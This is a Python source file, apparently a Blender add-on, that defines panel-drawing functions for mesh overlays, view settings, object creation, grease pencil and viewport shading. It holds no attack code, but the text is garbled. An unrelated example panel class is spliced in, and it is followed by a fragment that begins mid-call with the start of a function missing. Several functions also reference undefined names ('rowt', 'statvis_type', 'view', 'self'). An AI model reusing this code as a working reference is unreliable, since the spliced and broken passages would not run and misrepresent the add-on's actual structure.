gui_utilities.get_icons(ico_path)\n############################### CONSTANTS ###############################\n\ndef bsi_empty_panel(layout, context):\n\tpass\n\ndef VIEW3D_PP_meshproperties(layout, context):\n\tuse_freestyle = bpy.app.build_options.freestyle\n\tmesh = context.active_object.data\n\tscene = context.scene\n\n\tif (context.active_object and (context.mode == 'EDIT_MESH')):\n\t\tbox = layout.box()\n\t\tsplit = box.split()\n\t\tcol = split.column()\n\t\tcol.label(text=\"Overlays:\")\n\t\tcol.prop(mesh, \"show_faces\", text=\"Faces\")\n\t\tcol.prop(mesh, \"show_edges\", text=\"Edges\")\n\t\tcol.prop(mesh, \"show_edge_crease\", text=\"Creases\")\n\t\tif use_freestyle:\n\t\t\tcol.prop(mesh, \"show_edge_seams\", text=\"Seams\")\n\n\t\tbox.prop(mesh, \"show_weight\")\n\n\t\tcol = split.column()\n\t\tcol.label()\n\t\tif not use_freestyle:\n\t\t\tcol.prop(mesh, \"show_edge_seams\", text=\"Seams\")\n\t\tcol.prop(mesh, \"show_edge_sharp\", text=\"Sharp\", text_ctxt=i18n_contexts.plural)\n\t\tcol.prop(mesh, \"show_edge_bevel_weight\", text=\"Bevel\")\n\t\tif use_freestyle:\n\t\t\tcol.prop(mesh, \"show_freestyle_edge_marks\", text=\"Edge Marks\")\n\t\t\tcol.prop(mesh, \"show_freestyle_face_marks\", text=\"Face Marks\")\n\n\t\tbox = layout.box()\n\n\t\tbox.label(text=\"Normals:\")\n\t\trow = box.row(align=True)\n\n\t\trow.prop(mesh, \"show_normal_vertex\", text=\"\", icon='VERTEXSEL')\n\t\trow.prop(mesh, 
\"show_normal_loop\", text=\"\", icon='LOOPSEL')\n\t\trow.prop(mesh, \"show_normal_face\", text=\"\", icon='FACESEL')\n\n\t\tsub = row.row(align=True)\n\t\tsub.active = mesh.show_normal_vertex or mesh.show_normal_face or mesh.show_normal_loop\n\t\tsub.prop(scene.tool_settings, \"normal_size\", text=\"Size\")\n\n\t\tbox = layout.box()\n\t\tsplit = box.split()\n\t\tcol = split.column()\n\t\tcol.label(text=\"Edge Info:\")\n\t\tcol.prop(mesh, \"show_extra_edge_length\", text=\"Length\")\n\t\tcol.prop(mesh, \"show_extra_edge_angle\", text=\"Angle\")\n\t\tcol = split.column()\n\t\tcol.label(text=\"Face Info:\")\n\t\tcol.prop(mesh, \"show_extra_face_area\", text=\"Area\")\n\t\tcol.prop(mesh, \"show_extra_face_angle\", text=\"Angle\")\n\t\tif bpy.app.debug:\n\t\t\tlayout.prop(mesh, \"show_extra_indices\")\n\n\t\tstatvis = context.tool_settings.statvis\n\t\tbox = layout.box()\n\t\tbox.prop(mesh, \"show_statvis\", text=\"Mesh Analysis\")\n\t\tif mesh.show_statvis:\n\t\t\tbox.prop(statvis, \"type\")\n\t\t\tif statvis.type == 'OVERHANG':\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trow.prop(statvis, \"overhang_min\", text=\"\")\n\t\t\t\trow.prop(statvis, \"overhang_max\", text=\"\")\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trow.prop(statvis, \"overhang_axis\", expand=True)\n\t\t\telif statvis.type == 'THICKNESS':\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trow.prop(statvis, \"thickness_min\", text=\"\")\n\t\t\t\trow.prop(statvis, \"thickness_max\", text=\"\")\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trowt.prop(statvis, \"thickness_samples\")\n\t\t\telif statvis_type == 'INTERSECT':\n\t\t\t\tpass\n\t\t\telif statvis.type == 'DISTORT':\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trow.prop(statvis, \"distort_min\", text=\"\")\n\t\t\t\trow.prop(statvis, \"distort_max\", text=\"\")\n\t\t\telif statvis.type == 'SHARP':\n\t\t\t\trow = box.row(align=True)\n\t\t\t\trow.prop(statvis, \"sharp_min\", text=\"\")\n\t\t\t\trow.prop(statvis, \"sharp_max\", text=\"\")\n\n\ndef VIEW3D_PP_viewproperties(layout, context):\n\tv3d = GUI.get_screen_area(type = \"VIEW_3D\")\n\tcol = layout.column()\n\tcol.active = bool(v3d.region_3d.view_perspective != 'CAMERA' or v3d.region_quadviews)\n\tcol.prop(v3d, \"lens\")\n\tcol.label(text=\"Lock to Object:\")\n\tcol.prop(v3d, \"lock_object\", text=\"\")\n\tlock_object = v3d.lock_object\n\tif lock_object:\n\t\tif lock_object.type == 'ARMATURE':\n\t\t\tcol.prop_search(v3d, \"lock_bone\", lock_object.data,\n\t\t\t\t\t\t\t\"edit_bones\" if lock_object.mode == 'EDIT'\n\t\t\t\t\t\t\telse \"bones\",\n\t\t\t\t\t\t\ttext=\"\")\n\telse:\n\t\tcol.prop(v3d, \"lock_cursor\", text=\"Lock to Cursor\")\n\n\tcol = layout.column()\n\tcol.prop(v3d, \"lock_camera\")\n\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Clip:\")\n\tcol.prop(v3d, \"clip_start\", text=\"Start\")\n\tcol.prop(v3d, \"clip_end\", text=\"End\")\n\n\tsubcol = col.column(align=True)\n\tsubcol.enabled = not v3d.lock_camera_and_layers\n\tsubcol.label(text=\"Local Camera:\")\n\tsubcol.prop(v3d, \"camera\", text=\"\")\n\n\tcol = layout.column(align=True)\n\tcol.prop(view, \"use_render_border\")\n\tcol.active = v3d.region_3d.view_perspective != 'CAMERA'\n\n\ndef VIEW3D_TP_addobject(layout, context):\n\tcol = layout.column(align=True)\n\n\tcol.label(text=\"Primitives:\")\n\trow = col.row(align=True)\n\trow.operator(\"mesh.primitive_plane_add\", text=\" \", icon='MESH_PLANE')\n\trow.operator(\"mesh.primitive_cube_add\", text=\" \", icon='MESH_CUBE')\n\trow.operator(\"mesh.primitive_circle_add\", text=\" \", 
icon='MESH_CIRCLE')\n\trow.operator(\"mesh.primitive_uv_sphere_add\", text=\" \", icon='MESH_UVSPHERE')\n\trow.operator(\"mesh.primitive_ico_sphere_add\", text=\" \", icon='MESH_ICOSPHERE')\n\trow = col.row(align=True)\n\trow.operator(\"mesh.primitive_cylinder_add\", text=\" \", icon='MESH_CYLINDER')\n\trow.operator(\"mesh.primitive_cone_add\", text=\" \", icon='MESH_CONE')\n\trow.operator(\"mesh.primitive_torus_add\", text=\" \", icon='MESH_TORUS')\n\trow.operator(\"mesh.primitive_grid_add\", text=\" \", icon='MESH_GRID')\n\trow.operator(\"mesh.primitive_monkey_add\", text=\" \", icon='MESH_MONKEY')\n\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Misc:\")\n\trow = col.row(align=True)\n\trow.operator(\"object.text_add\", text=\" \", icon='OUTLINER_OB_FONT')\n\trow.operator(\"object.armature_add\", text=\" \", icon='OUTLINER_OB_ARMATURE')\n\trow.operator(\"object.add\", text=\" \", icon='OUTLINER_OB_LATTICE').type = 'LATTICE'\n\trow = col.row(align=True)\n\trow.operator(\"object.empty_add\", text=\" \", icon='OUTLINER_OB_EMPTY').type = 'PLAIN_AXES'\n\trow.operator(\"object.speaker_add\", text=\" \", icon='OUTLINER_OB_SPEAKER')\n\trow.operator(\"object.camera_add\", text=\" \", icon='OUTLINER_OB_CAMERA')\n\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Bezier:\")\n\trow = col.row(align=True)\n\trow.operator(\"curve.primitive_bezier_curve_add\", text=\"Bezier\", icon='CURVE_BEZCURVE')\n\trow.operator(\"curve.primitive_bezier_circle_add\", text=\"Circle\", icon='CURVE_BEZCIRCLE')\n\n\n\tcol.label(text=\"Nurbs and Surfaces:\")\n\trow = col.row(align=True)\n\trow.operator(\"curve.primitive_nurbs_curve_add\", text=\" \", icon='CURVE_NCURVE')\n\trow.operator(\"curve.primitive_nurbs_circle_add\", text=\" \", icon='CURVE_NCIRCLE')\n\trow.operator(\"curve.primitive_nurbs_path_add\", text=\" \", icon='CURVE_PATH')\n\n\t#col = layout.column(align=True)\n\t#col.label(text=\"Surface: \")\n\trow = col.row(align=True)\n\trow.operator(\"surface.primitive_nurbs_surface_curve_add\", text=\" \", icon='SURFACE_NCURVE')\n\trow.operator(\"surface.primitive_nurbs_surface_circle_add\", text=\" \", icon='SURFACE_NCIRCLE')\n\trow.operator(\"surface.primitive_nurbs_surface_surface_add\", text=\" \", icon='SURFACE_NSURFACE')\n\trow = col.row(align=True)\n\trow.operator(\"surface.primitive_nurbs_surface_cylinder_add\", text=\" \", icon='SURFACE_NCYLINDER')\n\trow.operator(\"surface.primitive_nurbs_surface_sphere_add\", text=\" \", icon='SURFACE_NSPHERE')\n\trow.operator(\"surface.primitive_nurbs_surface_torus_add\", text=\" \", icon='SURFACE_NTORUS')\n\n\tcol = layout.column(align=True)\n\trow = col.row(align=True)\n\t# row.operator_enum(\"object.metaball_add\",\"type\")\n\trow.operator_menu_enum(\"object.metaball_add\", \"type\",\n\t\t\t\t\t\t\ttext=\"Metaball\",\n\t\t\t\t\t\t\ticon='OUTLINER_OB_META'\n\t\t\t\t\t\t\t)\n\trow.operator_menu_enum(\"object.lamp_add\", \"type\",\n\t\t\t\t\t\t\ttext=\"Lamp\",\n\t\t\t\t\t\t\ticon='OUTLINER_OB_LAMP'\n\t\t\t\t\t\t\t)\n\ndef VIEW3D_TP_rigidbody(layout, context):\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Add/Remove:\")\n\trow = col.row(align=True)\n\trow.operator(\"rigidbody.objects_add\", text=\"Add Active\").type = 'ACTIVE'\n\trow.operator(\"rigidbody.objects_add\", text=\"Add Passive\").type = 'PASSIVE'\n\trow = col.row(align=True)\n\trow.operator(\"rigidbody.objects_remove\", text=\"Remove\")\n\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Object Tools:\")\n\tcol.operator(\"rigidbody.shape_change\", text=\"Change 
Shape\")\n\tcol.operator(\"rigidbody.mass_calculate\", text=\"Calculate Mass\")\n\tcol.operator(\"rigidbody.object_settings_copy\", text=\"Copy from Active\")\n\tcol.operator(\"object.visual_transform_apply\", text=\"Apply Transformation\")\n\tcol.operator(\"rigidbody.bake_to_keyframes\", text=\"Bake To Keyframes\")\n\tcol.label(text=\"Constraints:\")\n\tcol.operator(\"rigidbody.connect\", text=\"Connect\")\n\ndef VIEW3D_TP_relation(layout, context):\n\tcol = layout.column(align=True)\n\n\tcol.label(text=\"Group:\")\n\tcol.operator(\"group.create\", text=\"New Group\")\n\tcol.operator(\"group.objects_add_active\", text=\"Add to Active\")\n\tcol.operator(\"group.objects_remove\", text=\"Remove from Group\")\n\n\tcol.separator()\n\n\tcol.label(text=\"Parent:\")\n\trow = col.row(align=True)\n\trow.operator(\"object.parent_set\", text=\"Set\")\n\trow.operator(\"object.parent_clear\", text=\"Clear\")\n\n\tcol.separator()\n\n\tcol.label(text=\"Object Data:\")\n\tcol.operator(\"object.make_links_data\")\n\tcol.operator(\"object.make_single_user\")\n\n\tcol.separator()\n\n\tcol.label(text=\"Linked Objects:\")\n\tcol.operator(\"object.make_local\")\n\tcol.operator(\"object.proxy_make\")\n\ndef draw_keyframing_tools(context, layout):\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Keyframes:\")\n\trow = col.row(align=True)\n\trow.operator(\"anim.keyframe_insert_menu\", text=\"Insert\")\n\trow.operator(\"anim.keyframe_delete_v3d\", text=\"Remove\")\n\ndef VIEW3D_TP_animation(layout, context):\n\tdraw_keyframing_tools(context, layout)\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Motion Paths:\")\n\trow = col.row(align=True)\n\trow.operator(\"object.paths_calculate\", text=\"Calculate\")\n\trow.operator(\"object.paths_clear\", text=\"Clear\")\n\n\tcol.separator()\n\n\tcol.label(text=\"Action:\")\n\tcol.operator(\"nla.bake\", text=\"Bake Action\")\n\ndef gpencil_stroke_placement_settings(context, layout, gpd):\n\tcol = layout.column(align=True)\n\n\tcol.label(text=\"Stroke Placement:\")\n\n\trow = col.row(align=True)\n\trow.prop_enum(gpd, \"draw_mode\", 'VIEW')\n\trow.prop_enum(gpd, \"draw_mode\", 'CURSOR')\n\n\tif context.space_data.type == 'VIEW_3D':\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(gpd, \"draw_mode\", 'SURFACE')\n\t\trow.prop_enum(gpd, \"draw_mode\", 'STROKE')\n\n\t\trow = col.row(align=False)\n\t\trow.active = gpd.draw_mode in {'SURFACE', 'STROKE'}\n\t\trow.prop(gpd, \"use_stroke_endpoints\")\n\ndef VIEW3D_TP_greasepencil(layout, context):\n\tcol = layout.column(align=True)\n\n\tcol.label(text=\"Draw:\")\n\trow = col.row(align=True)\n\trow.operator(\"gpencil.draw\", text=\"Draw\").mode = 'DRAW'\n\trow.operator(\"gpencil.draw\", text=\"Erase\").mode = 'ERASER'\n\n\trow = col.row(align=True)\n\trow.operator(\"gpencil.draw\", text=\"Line\").mode = 'DRAW_STRAIGHT'\n\trow.operator(\"gpencil.draw\", text=\"Poly\").mode = 'DRAW_POLY'\n\n\trow = col.row(align=True)\n\trow.prop(context.tool_settings, \"use_grease_pencil_sessions\", text=\"Continuous Drawing\")\n\n\tif context.space_data.type in {'VIEW_3D', 'CLIP_EDITOR'}:\n\t\tcol.separator()\n\t\tcol.label(\"Data Source:\")\n\t\trow = col.row(align=True)\n\t\tif context.space_data.type == 'VIEW_3D':\n\t\t\trow.prop(context.tool_settings, \"grease_pencil_source\", expand=True)\n\t\telif context.space_data.type == 'CLIP_EDITOR':\n\t\t\trow.prop(context.space_data, \"grease_pencil_source\", expand=True)\n\n\tgpd = context.gpencil_data\n\tif gpd:\n\t\tcol.separator()\n\t\tgpencil_stroke_placement_settings(context, col, 
gpd)\n\n\tif context.space_data.type == 'VIEW_3D':\n\t\tcol.separator()\n\t\tcol.separator()\n\n\t\tcol.label(text=\"Tools:\")\n\t\tcol.operator(\"gpencil.convert\", text=\"Convert...\")\n\t\tcol.operator(\"view3d.ruler\")\n\n\tgpd = context.gpencil_data\n\tif gpd is None:\n\t\treturn\n\tedit_ok = bool(context.editable_gpencil_strokes) and bool(gpd.use_stroke_edit_mode)\n\n\tcol = layout.column(align=True)\n\tcol.prop(gpd, \"use_stroke_edit_mode\", text=\"Enable Editing\", icon='EDIT', toggle=True)\n\n\tcol.separator()\n\n\tcol.label(text=\"Select:\")\n\tsubcol = col.column(align=True)\n\tsubcol.active = edit_ok\n\tsubcol.operator(\"gpencil.select_all\", text=\"Select All\")\n\tsubcol.operator(\"gpencil.select_border\")\n\tsubcol.operator(\"gpencil.select_circle\")\n\n\tcol.separator()\n\n\tsubcol = col.column(align=True)\n\tsubcol.active = edit_ok\n\tsubcol.operator(\"gpencil.select_linked\")\n\tsubcol.operator(\"gpencil.select_more\")\n\tsubcol.operator(\"gpencil.select_less\")\n\n\tcol.separator()\n\n\tcol.label(text=\"Edit:\")\n\trow = col.row(align=True)\n\trow.active = edit_ok\n\trow.operator(\"gpencil.copy\", text=\"Copy\")\n\trow.operator(\"gpencil.paste\", text=\"Paste\")\n\n\tsubcol = col.column(align=True)\n\tsubcol.active = edit_ok\n\tsubcol.operator(\"gpencil.delete\", text=\"Delete\")\n\tsubcol.operator(\"gpencil.duplicate_move\", text=\"Duplicate\")\n\tsubcol.operator(\"transform.mirror\", text=\"Mirror\").gpencil_strokes = True\n\n\tcol.separator()\n\n\tsubcol = col.column(align=True)\n\tsubcol.active = edit_ok\n\tsubcol.operator(\"transform.translate\").gpencil_strokes = True # icon='MAN_TRANS'\n\tsubcol.operator(\"transform.rotate\").gpencil_strokes = True # icon='MAN_ROT'\n\tsubcol.operator(\"transform.resize\", text=\"Scale\").gpencil_strokes = True # icon='MAN_SCALE'\n\n\tcol.separator()\n\n\tsubcol = col.column(align=True)\n\tsubcol.active = edit_ok\n\tsubcol.operator(\"transform.bend\", text=\"Bend\").gpencil_strokes = True\n\tsubcol.operator(\"transform.shear\", text=\"Shear\").gpencil_strokes = True\n\tsubcol.operator(\"transform.tosphere\", text=\"To Sphere\").gpencil_strokes = True\n\n\n\ndef VIEW3D_PP_motiontracking(layout, context):\n\tv3d = GUI.get_screen_area(type = \"VIEW_3D\")\n\tlayout.prop(v3d, \"show_reconstruction\", text=\"Motion Tracking\")\n\tif v3d.show_reconstruction:\n\t\tcol = layout.column()\n\t\tcol.prop(v3d, \"show_camera_path\", text=\"Camera Path\")\n\t\tcol.prop(v3d, \"show_bundle_names\", text=\"3D Marker Names\")\n\t\tcol.label(text=\"Track Type and Size:\")\n\t\trow = col.row(align=True)\n\t\trow.prop(v3d, \"tracks_draw_type\", text=\"\")\n\t\trow.prop(v3d, \"tracks_draw_size\", text=\"\")\n\ndef VIEW3D_TP_meshedit(layout, context):\n\tmode = MESH.get_selection_mode()\n\tif mode == \"OBJECT\":\n\t\tmesh_edit_object_mode(layout, context)\n\telse:\n\t\tmesh_edit_edit_mode(layout, context)
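\n\n# A minimal sketch of how one of the module-level draw helpers above could be\n# hooked into a registered panel; the class name, label and region are\n# assumptions for illustration, not part of this add-on:\nclass VIEW3D_PT_bsi_example(bpy.types.Panel):\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'TOOLS'\n\tbl_label = \"BSI Example\"\n\n\tdef draw(self, context):\n\t\t# delegate to a (layout, context) helper defined in this module\n\t\tVIEW3D_TP_relation(self.layout, context)\n\n# bpy.utils.register_class(VIEW3D_PT_bsi_example) # registration left to the add-on's register()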
text=\"Extrude Individual\")\n\tcol.operator(\"mesh.inset\", text=\"Inset Faces\")\n\tcol.operator(\"mesh.edge_face_add\")\n\tcol.operator(\"mesh.subdivide\")\n\tcol.operator(\"mesh.loopcut_slide\")\n\tcol.operator(\"mesh.offset_edge_loops_slide\")\n\tcol.operator(\"mesh.duplicate_move\", text=\"Duplicate\")\n\trow = col.row(align=True)\n\trow.operator(\"mesh.spin\")\n\trow.operator(\"mesh.screw\")\n\n\trow = col.row(align=True)\n\tprops = row.operator(\"mesh.knife_tool\", text=\"Knife\")\n\tprops.use_occlude_geometry = True\n\tprops.only_selected = False\n\tprops = row.operator(\"mesh.knife_tool\", text=\"Select\")\n\tprops.use_occlude_geometry = False\n\tprops.only_selected = True\n\tcol.operator(\"mesh.knife_project\")\n\tcol.operator(\"mesh.bisect\")\n\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Remove:\")\n\tcol.menu(\"VIEW3D_MT_edit_mesh_delete\")\n\tcol.operator_menu_enum(\"mesh.merge\", \"type\")\n\tcol.operator(\"mesh.remove_doubles\")\n\ndef mesh_edit_object_mode(layout, context):\n\tr\"\"\" Taken from blender mesh edit layout\"\"\"\n\tcol = layout.column(align=True)\n\tcol.operator(\"object.duplicate_move\", text=\"Duplicate\")\n\tcol.operator(\"object.duplicate_move_linked\", text=\"Duplicate Linked\")\n\n\tcol.operator(\"object.delete\")\n\n\tobj = context.active_object\n\tif obj:\n\t\tobj_type = obj.type\n\n\t\tif obj_type in {'MESH', 'CURVE', 'SURFACE', 'ARMATURE'}:\n\t\t\tcol = layout.column(align=True)\n\t\t\tcol.operator(\"object.join\")\n\n\t\tif obj_type in {'MESH', 'CURVE', 'SURFACE', 'ARMATURE', 'FONT', 'LATTICE'}:\n\t\t\tcol = layout.column(align=True)\n\t\t\tcol.operator_menu_enum(\"object.origin_set\", \"type\", text=\"Set Origin\")\n\n\t\tif obj_type in {'MESH', 'CURVE', 'SURFACE'}:\n\t\t\tcol = layout.column(align=True)\n\t\t\tcol.label(text=\"Shading:\")\n\t\t\trow = col.row(align=True)\n\t\t\trow.operator(\"object.shade_smooth\", text=\"Smooth\")\n\t\t\trow.operator(\"object.shade_flat\", text=\"Flat\")\n\n\t\tif obj_type == 'MESH':\n\t\t\tcol = layout.column(align=True)\n\t\t\tcol.label(text=\"Data Transfer:\")\n\t\t\trow = col.row(align=True)\n\t\t\trow.operator(\"object.data_transfer\", text=\"Data\")\n\t\t\trow.operator(\"object.datalayout_transfer\", text=\"Data Layout\")\n\n\ndef bsi_modeling_panel(layout, context):\n\tcol = layout.column(align=True)\n\tcol.operator(\"wm.bsi_decorator_button\",text=\"Get\")\n\tcol.menu(\"INFO_MT_bsi_primitive\", text=\"Primitive\")\n\tcol.menu(\"INFO_MT_bsi_material\", text=\"Material\")\n\tcol.menu(\"INFO_MT_bsi_property\", text=\"Property\")\n\n\tcol = layout.column(align=True)\n\tcol.operator(\"wm.bsi_decorator_button\",text=\"Create\")\n\tcol.menu(\"VIEW3D_MT_BSI_curve_create\", text=\"Curve\")\n\tcol.menu(\"INFO_MT_add\", text=\"Surf.Mesh\")\n\tcol.menu(\"INFO_MT_add\", text=\"Poly.Mesh\")\n\tcol.menu(\"INFO_MT_add\", text=\"Skeleton\")\n\tcol.menu(\"INFO_MT_add\", text=\"Model\")\n\tcol.menu(\"INFO_MT_add\", text=\"Text\")\n\n\tlayout = self.layout\n\tcol = layout.column(align=True)\n\tcol.operator(\"wm.bsi_decorator_button\",text=\"Modify\")\n\tcol.menu(\"INFO_MT_add\", text=\"Curve\")\n\tcol.menu(\"INFO_MT_add\", text=\"Surf.Mesh\")\n\tcol.menu(\"INFO_MT_add\", text=\"Poly.Mesh\")\n\tcol.menu(\"INFO_MT_add\", text=\"Deform\")\n\tcol.menu(\"INFO_MT_add\", text=\"Model\")\n\ndef viewport_shading_panel(layout, context):\n\tv3d \t= GUI.get_screen_area(\"VIEW_3D\")\n\tscene \t= context.scene\n\n\tbox = layout.box()\n\tbox.label(text= \"Viewport Shading\")\n\tcol = box.column()\n\tcol.prop(context.scene, 
\"boundbox\", text=\"Bounding Box\")\n\tcol.prop(context.scene, \"wireframe\", text=\"Wireframe\")\n\tcol.prop(context.scene, \"constant\", text=\"Constant\")\n\tcol.prop(context.scene, \"solid\", text=\"Shaded\")\n\tcol.prop(context.scene, \"textured\", text=\"Textured\")\n\tcol.prop(context.scene, \"textured_decal\", text=\"Textured Decal\")\n\ndef viewport_fx_panel(layout, context):\n\tv3d \t\t\t= GUI.get_screen_area(\"VIEW_3D\")\n\tscene \t\t\t= context.scene\n\tgame_settings \t= scene.game_settings\n\tbox = layout.box()\n\tbox.label(text= \"FX Shading\")\n\tcol = box.column()\n\tif not scene.render.use_shading_nodes:\n\t\tcol.prop(game_settings, \"material_mode\", text=\"\")\n\n\tif v3d.viewport_shade == 'SOLID':\n\t\tcol.prop(v3d, \"use_matcap\")\n\t\tif v3d.use_matcap:\n\t\t\tcol.template_icon_view(v3d, \"matcap_icon\")\n\t\tif not v3d.use_matcap:\n\t\t\tcol.prop(v3d, \"show_textured_solid\")\n\n\tfx_settings = v3d.fx_settings\n\n\tif v3d.viewport_shade not in {'BOUNDBOX', 'WIREFRAME'}:\n\t\tsub = col.column()\n\t\tsub.active = v3d.region_3d.view_perspective == 'CAMERA'\n\t\tsub.prop(fx_settings, \"use_dof\")\n\t\tcol.prop(fx_settings, \"use_ssao\", text=\"Ambient Occlusion\")\n\t\tif fx_settings.use_ssao:\n\t\t\tssao_settings = fx_settings.ssao\n\t\t\tsubcol = col.column(align=True)\n\t\t\tsubcol.prop(ssao_settings, \"factor\")\n\t\t\tsubcol.prop(ssao_settings, \"distance_max\")\n\t\t\tsubcol.prop(ssao_settings, \"attenuation\")\n\t\t\tsubcol.prop(ssao_settings, \"samples\")\n\t\t\tsubcol.prop(ssao_settings, \"color\")\n\n\tcol.prop(v3d, \"show_only_render\")\n\tcol.prop(v3d, \"show_world\")\n\ndef viewport_objects_panel(layout, context):\n\tv3d \t= GUI.get_screen_area(\"VIEW_3D\")\n\tscene \t= context.scene\n\tobj = context.object\n\tdisplay_all = v3d.show_only_render\n\tbox = layout.box()\n\tcol = box.column()\n\tcol.label(text=\"Object Shading\")\n\tif display_all:\n\t\tcol.label(text=\"Hidden because of \\\"Only Render\\\"\")\n\tif not display_all:\n\t\tcol.prop(context.scene, \"show_wire\", text=\"Wireframe On Shaded\")\n\t\tif v3d.viewport_shade not in {'BOUNDBOX', 'WIREFRAME'}:\n\t\t\tif obj and obj.mode == 'EDIT':\n\t\t\t\tcol.prop(context.scene, \"occlude_wire\", text=\"Occlude Wire\")\n\t\t\t\tcol.prop(v3d, \"show_occlude_wire\")\n\t\tcol.prop(context.scene, \"show_x_ray\", text=\"X Ray <--LAME\")\n\t\tcol.prop(context.scene, \"show_all_edges\", text=\"All Edges <--WTF is this\")\n\t\tcol.prop(context.scene, \"show_axis\", text=\"Axis\")\n\t\tcol.prop(context.scene, \"show_bounds\", text=\"Bounding Boxes\")\n\t\tcol.prop(context.scene, \"show_name\", text=\"Names\")\n\t\tcol.prop(context.scene, \"show_only_shape_key\", text=\"Shapes\")\n\t\tcol.prop(v3d, \"show_backface_culling\")\n\n\t\tif v3d.show_backface_culling:\n\t\t\tcol.prop(context.scene, \"show_transparent\", text=\"Hide Outline\")\n\t\tcol.prop(context.scene, \"show_texture_space\", text=\"Texture Space\")\n\t\tcol.prop(v3d, \"show_outline_selected\")\n\t\tcol.prop(v3d, \"show_all_objects_origin\", text = \"Object Origins\")\n\t\tcol.prop(v3d, \"show_relationship_lines\", text = \"Relationships\")\n\ndef viewport_widgets_panel(layout, context):\n\tv3d \t\t\t= GUI.get_screen_area(\"VIEW_3D\")\n\tscene \t\t\t= context.scene\n\n\tbox = layout.box()\n\tcol = box.column()\n\tcol.label(text=\"Viewport Widgets\")\n\tdisplay_all = v3d.show_only_render\n\tif display_all:\n\t\tcol.label(text=\"Hidden because of \\\"Only Render\\\"\")\n\tif not display_all:\n\t\tsplit = col.split(percentage=0.55)\n\t\tsplit.prop(v3d, 
\"show_floor\", text=\"Grid Floor\")\n\n\t\trow = split.row(align=True)\n\t\trow.prop(v3d, \"show_axis_x\", text=\"X\", toggle=True)\n\t\trow.prop(v3d, \"show_axis_y\", text=\"Y\", toggle=True)\n\t\trow.prop(v3d, \"show_axis_z\", text=\"Z\", toggle=True)\n\n\t\tsub = col.column(align=True)\n\t\tsub.prop(v3d, \"grid_lines\", text=\"Lines\")\n\t\tsub.prop(v3d, \"grid_scale\", text=\"Scale\")\n\t\tcol.prop(v3d ,\"cursor_location\")\n\t\tsubsub = sub.column(align=True)\n\t\tsubsub.active = scene.unit_settings.system == 'NONE'\n\t\tsubsub.prop(v3d, \"grid_subdivisions\", text=\"Subdivisions\")\n\n\t\tbox.operator(\"screen.region_quadview\", text=\"Toggle Quad View\")\n\n\t\tif v3d.region_quadviews:\n\t\t\tregion = v3d.region_quadviews[2]\n\t\t\tcol = box.column()\n\t\t\tcol.prop(region, \"lock_rotation\")\n\t\t\trow = col.row()\n\t\t\trow.enabled = region.lock_rotation\n\t\t\trow.prop(region, \"show_sync_view\")\n\t\t\trow = col.row()\n\t\t\trow.enabled = region.lock_rotation and region.show_sync_view\n\t\t\trow.prop(region, \"use_box_clip\")\n\ndef viewport_properties_panel(layout, context):\n\tviewport_shading_panel(layout, context)\n\tviewport_fx_panel(layout, context)\n\tviewport_objects_panel(layout, context)\n\tviewport_widgets_panel(layout, context)\n\n##########################################################\n# dynamic prop panel methods\n##########################################################\n\n\ndef ANKI_PP_home(layout, context):\n\tscene = context.scene\n\n\t# Create a simple row.\n\tlayout.label(text=\" Simple Row:\")\n\n\trow = layout.row()\n\trow.prop(scene, \"frame_start\")\n\trow.prop(scene, \"frame_end\")\n\trow.prop(scene, \"frame_end\")\n\trow.prop(scene, \"frame_end\")\n\n\t# Create an row where the buttons are aligned to each other.\n\tlayout.label(text=\" Aligned Row:\")\n\n\trow = layout.row(align=True)\n\trow.prop(scene, \"frame_start\")\n\trow.prop(scene, \"frame_end\")\n\n\t# Create two columns, by using a split layout.\n\tsplit = layout.split()\n\n\t# First column\n\tcol = split.column()\n\tcol.label(text=\"Column One:\")\n\tcol.prop(scene, \"frame_end\")\n\tcol.prop(scene, \"frame_start\")\n\n\t# Second column, aligned\n\tcol = split.column(align=True)\n\tcol.label(text=\"Column Two:\")\n\tcol.prop(scene, \"frame_start\")\n\tcol.prop(scene, \"frame_end\")\n\n\t# Big render button\n\tlayout.label(text=\"Big Button:\")\n\trow = layout.row()\n\trow.scale_y = 3.0\n\trow.operator(\"render.render\")\n\n\t# Different sizes in a row\n\tlayout.label(text=\"Different button sizes:\")\n\trow = layout.row(align=True)\n\trow.operator(\"render.render\")\n\n\tsub = row.row()\n\tsub.scale_x = 2.0\n\tsub.operator(\"render.render\")\n\n\trow.operator(\"render.render\")\n\ndef uv_tiling_layout(layout, texture_node):\n\tr\"\"\" UV tiling properties\"\"\"\n\tbox =layout.box()\n\tbox.prop(texture_node, \"extension\", text= \"\")\n\tcol = box.column(align=True)\n\trow = col.row(align=True)\n\n\tif texture_node.extension == 'REPEAT':\n\t\trow.label(text=\"Mirror and Repeat:\")\n\t\tcol = box.column(align=True)\n\t\trow = col.row()\n\t\trow.prop(texture_node, \"use_mirror_x\", text=\"\",\n\t\t\t\t\ticon_value=(ico[\"toggle_on\"].icon_id\n\t\t\t\t\tif texture_node.use_mirror_x\n\t\t\t\t\telse ico[\"toggle_off\"].icon_id ),\n\t\t\t\t\temboss=False)\n\t\trow.prop(texture_node, \"repeat_x\", text=\"Repeat X\")\n\t\trow.active = (texture_node.repeat_x > 1)\n\n\t\trow = col.row()\n\t\trow.prop(texture_node, \"use_mirror_y\", text=\"\",\n\t\t\ticon_value=(ico[\"toggle_on\"].icon_id\n\t\t\tif 
